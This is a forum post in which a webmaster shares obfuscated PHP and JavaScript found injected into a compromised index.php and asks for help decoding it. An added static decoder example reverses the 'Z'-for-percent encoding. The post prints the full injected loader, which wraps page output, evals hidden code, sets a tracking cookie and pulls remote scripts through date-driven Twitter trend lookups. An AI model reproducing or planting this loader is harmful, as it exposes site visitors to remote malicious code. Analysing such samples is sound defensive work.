I noticed these two long lines at the very top of the index.php file while upgrading some web pages.
I think somebody has gained access in some way, overwriting the file and adding this code, and I can't really understand what it is doing. Any help on discovering what the scope of this PHP + JavaScript is?
Code:
<?php ob_start('security_update'); function security_update($buffer){return $buffer.'<script language="javascript">function t(){return z($a);}var $a="Z64aZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ25Z22;ccZ3dZ225ngZ2574h;Z2569++Z2529Z257btmpZ253dds.sZ256cicZ2565Z2528Z2569,iZ252b1)Z253bsZ22;cdZ3dZ22Z2574Z253dsZ2574+StZ2572inZ2567.frZ256fZ256dZ2543haZ2572CodZ2565((Z2574Z256dp.Z22;caZ3dZ22Z2566unZ2563tioZ256e dcZ2573(dZ2573,Z2565s)Z257bdsZ253duZ256eZ2565Z2573caZ2570Z22;opZ3dZ22Z2524aZ253dZ2522dw(Z2564csZ2528cu,Z25314)Z2529;Z2522;Z22;czZ3dZ22Z2566Z2575nctZ2569onZ2520cz(Z2563zZ2529Z257bretZ2575rn Z2563aZ252bcbZ252bcc+Z2563Z2564Z252bZ2563e+cZ257a;};Z22;dbZ3dZ227FtuQd8!90;0!Z25200;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0--0Z252009kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0Z270;gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3e|u~wdx+m0yv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vZ22;dzZ3dZ22Z2566uZ256ectZ2569oZ256e 
dwZ2528t)Z257bcaZ253dZ2527Z252564oZ2525Z25363umZ2565Z25256etZ25252ewZ2572Z252569teZ252528Z2525Z25322Z2527;ceZ253dZ2527Z252522Z252529Z2527;Z2563bZ253dZ2527Z25253csZ252563rZ252569Z252570tZ2520Z25256caZ25256egZ2575Z25256Z2531Z252567eZ25253dZ25255cZ252522javZ2561sZ252563Z252572iZ252570tZ25255cZ25252Z2532Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252fscZ2572iZ252570Z2574Z25253eZ2527Z253bevaZ256c(Z2575Z256eescZ2561Z2570eZ2528Z2574))Z257d;Z22;deZ3dZ22209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+Z2519}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;ceZ3dZ22cZ2568Z2561rCZ256fdeAZ2574(0Z2529Z255e(Z25270x00Z2527+Z2565Z2573)))Z253b}Z257dZ22;stZ3dZ22Z2573tZ253dZ2522$Z2561Z253dsZ2574;Z2564cZ2573(Z2564Z2561Z252bZ2564bZ252bZ2564cZ252bdZ2564+Z2564Z2565Z252c1Z2530Z2529Z253bZ2564wZ2528sZ2574Z2529;Z2573tZ253d$Z2561;Z2522Z253bZ22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;v}zfszZ2526;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;dcZ3dZ22rs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07huc7Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;Z22;ddZ3dZ2208y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+Z2519~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxy
vdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z2519iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25Z22;cbZ3dZ22e(dZ2573)Z253bstZ253dtmpZ253dZ2527Z2527;for(Z2569Z253d0Z253biZ253cZ2564s.lZ256Z22;Z69f (Z64oZ63umZ65Z6et.Z63ookZ69e.Z69ndeZ78OfZ28Z27rf5f6dZ73Z27)Z3dZ3d-1)Z7bfunctiZ6fn cZ61Z6cZ6cbZ61ckZ28xZ29Z7bwiZ6edoZ77.twZ20Z3d Z78;vZ61Z72Z20dZ20Z3d nZ65wZ20DZ61Z74e()Z3bd.sZ65Z74TimZ65Z28x[Z22as_Z6ffZ22]*10Z300);Z76ar Z68Z20Z3d dZ2egetZ55TZ43HoZ75rZ73Z28);wZ69ndZ6fw.hZ20Z3dZ20Z68;iZ66 (hZ20Z3e 8)Z7bd.sZ65Z74Z55TZ43DaZ74Z65(dZ2egetZ55TCDZ61teZ28) -Z202)Z3b}elZ73eZ7bd.Z73etZ55TZ43Z44ateZ28Z64.Z67Z65tUZ54Z43Z44atZ65() Z2d Z33);}Z77Z69nZ64owZ2egdZ20Z3d Z64;vaZ72Z20Z74iZ6de Z3d nZ65w AZ72rayZ28);vZ61r sZ68iZ66Z74Z49Z6eZ64exZ20Z3d Z22Z22;time[Z22yearZ22] Z3d d.Z67Z65Z74UTZ43Z46ulZ6cYeZ61rZ28Z29;Z74imeZ5bZ22monZ74hZ22Z5dZ20Z3d d.Z67Z65Z74UZ54Z43MZ6fnthZ28Z29Z2b1Z3btZ69meZ5bZ22dayZ22] Z3d d.geZ74UTZ43Z44ateZ28);Z69Z66 (dZ2egZ65tUTZ43MZ6fZ6eth(Z29+1 Z3cZ2010)Z7bZ73hZ69fZ74IndZ65Z78 Z3d tZ69me[Z22yeaZ72Z22] + Z22-0Z22 +Z20(d.Z67etUZ54CMoZ6etZ68Z28)Z2b1)Z3b}Z65lseZ7bZ73hifZ74IndZ65x Z3d tiZ6dZ65[Z22yeZ61Z72Z22]Z20+ Z22-Z22 Z2bZ20(Z64.gZ65tZ55TZ43Z4dontZ68()Z2bZ31Z29Z3b}iZ66 (dZ2egeZ74Z55TCZ44Z61teZ28) Z3cZ20Z310Z29Z7bshZ69fZ74IZ6edeZ78 Z3dshZ69fZ74IndZ65x +Z20Z22-0Z22 +Z20Z64.Z67etUZ54CDaZ74Z65();Z7delsZ65Z7bshiftZ49ndeZ78Z20Z3d shifZ74IndZ65x +Z20Z22-Z22 + d.geZ74UTZ43DZ61teZ28Z29;}Z64Z6fcuZ6deZ6etZ2ewriZ74eZ28Z22Z3cscrZ22+Z22iZ70t Z6caZ6eZ67Z75aZ67eZ3djavZ61scrZ69ptZ22+Z22 srZ63Z3dZ27http:Z2fZ2fsearZ63Z68Z2etZ77Z69ttZ65rZ2eZ63Z6fZ6dZ2ftrZ65ndsZ2fdZ61ilyZ2eZ6asoZ6e?dZ61Z74eZ3dZ22+ sZ68Z69ftZ49Z6eZ64eZ78Z2bZ22&callbZ61ckZ3dcaZ6clbZ61cZ6b2Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iZ70tZ3eZ22);} Z66unZ63tZ69on Z63aZ6clbZ61cZ6b2(xZ29Z7bwiZ6edoZ77.Z74Z77 Z3d 
x;scZ28Z27rf5Z666dsZ27,Z32,7Z29;evZ61l(Z75Z6eesZ63aZ70e(dZ7aZ2bcz+Z6fp+sZ74)+Z27dZ77(dZ7a+czZ28$Z61Z2bstZ29);Z27)Z3bdocZ75Z6dentZ2ewrZ69teZ28$aZ29Z3b}dZ6fcumZ65nZ74.wZ72Z69Z74Z65(Z22Z3cimZ67 sZ72cZ3dZ27httpZ3aZ2fZ2fsZ65aZ72cZ68.Z74wZ69ttZ65r.cZ6fmZ2fiZ6dagZ65sZ2fseaZ72chZ2frZ73Z73Z2eZ70Z6egZ27 wZ69dZ74hZ3d1 hZ65igZ68tZ3d1Z20Z73tylZ65Z3dZ27visibiliZ74Z79Z3ahZ69Z64Z64Z65nZ27 Z2fZ3e Z3cscrZ22+Z22ipt lanZ67uZ61Z67eZ3djavZ61sZ63rZ69pZ74Z22+Z22 srcZ3dZ27httpZ3aZ2fZ2fsearchZ2etwiZ74teZ72Z2ecomZ2ftZ72eZ6eZ64sZ2fdZ61ilyZ2ejZ73on?Z63alZ6cbaZ63kZ3dcalZ6cbacZ6bZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);Z7delsZ65Z7b$aZ3dZ27Z27};funZ63tZ69Z6fn sZ63(cZ6em,vZ2ceZ64Z29Z7bvarZ20exZ64Z3dnewZ20Z44aZ74e()Z3bexdZ2esZ65tDaZ74e(Z65xZ64Z2egZ65tDaZ74eZ28)+eZ64Z29;Z64ocZ75meZ6etZ2ecooZ6biZ65Z3dcnmZ2bZ20Z27Z3dZ27 +eZ73capZ65(v)Z2bZ27;eZ78Z70ireZ73Z3dZ27+exZ64.toZ47MTZ53trZ69Z6egZ28);}Z3b";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}var x=0;eval(t());</script>';}//important security update ?>
Analyzing a little piece, I can understand, for example, a very simple thing like:
Code:
httpZ3aZ2fZ2fsZ65aZ72cZ68.
I can determine that:
Z3a is : (colon)
and Z2f is / (slash)
But that is easy; much more investigation is necessary to understand it, and I have not checked/don't know if this is an octal (it isn't, but for example) or some other kind of converted string. Maybe someone like a JS guru can explain, in a short and easy way, this JavaScript code inside a PHP function that grabs the buffer. Thank you, anybody.
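
The "Z" scheme asked about above is URL percent-encoding with "%" swapped for "Z": the script's own z() function replaces each "Z" with "%" and calls unescape(), so Z3a is %3a, hex 0x3A. The decoder below is an added example, not part of the original post; it unfolds the percent-encoding layers statically, without eval, and its function names are assumptions made for illustration.

```javascript
// Added example: static decoder for the "Z"+hex scheme. Nothing is eval'd.

// The injected z() swaps every "Z" for "%" before calling unescape().
function zToPercent(s) {
  return s.replace(/Z/g, "%");
}

// One pass of %XX decoding, matching unescape() for two-digit escapes.
// A "%" that is not followed by two hex digits is left untouched.
function percentDecodeOnce(s) {
  return s.replace(/%([0-9a-fA-F]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16)));
}

// Decode pass by pass until the text stops changing, keeping every layer
// so an analyst can see where "%25xx" (an escaped "%xx") unfolds.
function decodeLayers(encoded, maxLayers = 5) {
  const layers = [];
  let current = zToPercent(encoded);
  for (let i = 0; i < maxLayers; i++) {
    const next = percentDecodeOnce(current);
    if (next === current) break;
    layers.push(next);
    current = next;
  }
  return layers;
}

// Collect distinct http(s) URLs from decoded text for review or blocking.
function extractUrls(text) {
  return [...new Set(text.match(/https?:\/\/[^\s'"<>)]+/g) || [])];
}

// Fragments copied from the posted payload.
const SAMPLES = [
  "httpZ3aZ2fZ2fsZ65aZ72cZ68.",
  "Z2566unZ2563tioZ256e dcZ2573(dZ2573,Z2565s)",
];

for (const sample of SAMPLES) {
  decodeLayers(sample).forEach((layer, n) =>
    console.log(`layer ${n + 1}: ${layer}`));
}
```

The second sample needs two passes because "Z25" decodes to a literal "%", which exposes another escaped layer underneath.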